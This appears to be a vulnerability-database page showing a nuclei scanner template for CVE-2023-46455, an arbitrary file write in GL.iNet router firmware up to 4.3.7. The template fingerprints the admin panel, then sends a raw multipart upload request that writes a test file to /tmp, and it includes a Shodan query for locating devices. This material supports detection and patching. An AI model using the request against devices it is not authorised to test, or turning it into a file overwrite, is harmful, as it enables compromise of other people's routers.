Lucene search
K

GL.iNet <= 4.3.7 - Arbitrary File Write

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

GL.iNet <= 4.3.7 suffers from an arbitrary file write vulnerability enabling system file overwrites.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
GL.iNet AR300M v4.3.7 Arbitrary File Read Exploit
4 Mar 202400:00
zdt
GithubExploit
Exploit for OS Command Injection in Gl-Inet Gl-Ar300M_Firmware
8 Dec 202301:45
githubexploit
ATTACKERKB
CVE-2023-46455
12 Dec 202315:15
attackerkb
Circl
CVE-2023-46455
8 Dec 202301:48
circl
CNNVD
GL.iNet GL-AR300M Security Vulnerability
12 Dec 202300:00
cnnvd
CVE
CVE-2023-46455
12 Dec 202300:00
cve
Cvelist
CVE-2023-46455
12 Dec 202300:00
cvelist
Exploit DB
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
3 Mar 202400:00
exploitdb
NVD
CVE-2023-46455
12 Dec 202315:15
nvd
OSV
CVE-2023-46455
12 Dec 202315:15
osv
Rows per page
id: CVE-2023-46455

info:
  name: GL.iNet <= 4.3.7 - Arbitrary File Write
  author: Zierax
  severity: high
  description: |
    GL.iNet <= 4.3.7 is vulnerable to an arbitrary file write exploit, allowing an attacker to overwrite arbitrary system files.
  impact: |
    Unauthenticated attackers can overwrite arbitrary system files, potentially compromising the device configuration and enabling persistent access.
  remediation: |
    Upgrade GL.iNet devices to firmware version 4.3.8 or later.
  reference:
    - https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities/blob/main/CVE-2023-46455.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46455
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-46455
    cwe-id: CWE-22
    epss-score: 0.46966
    epss-percentile: 0.98687
    cpe: cpe:2.3:o:gl-inet:gl-ar300m_firmware:4.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gl-inet
    product: gl-ar300m_firmware
    shodan-query: title:"GL.iNet Admin Panel"
  tags: cve,cve2023,gl-net,file-upload,intrusive,vuln

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"
  file: "{{to_lower(rand_text_alpha(4))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "GL.iNet"
        internal: true
        case-insensitive: true

  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835
        X-Requested-With: XMLHttpRequest

        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="sid"

        {{auth_token}}
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="size"

        4
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="path"

        /tmp/{{string}}
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="file"; filename="{{file}}"
        Content-Type: application/octet-stream

        {{string}}
        -----------------------------81419250823331111993422505835--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "File uploaded successfully"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d79445f44324190a45d45937c9f557851a7084b5ccc3fa977bd6f867d8a518e90221008c3a58895c8c6c88bc0b382da865eb28e8cc616d4f3e3d13431227c265767c11:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.46966
SSVC
23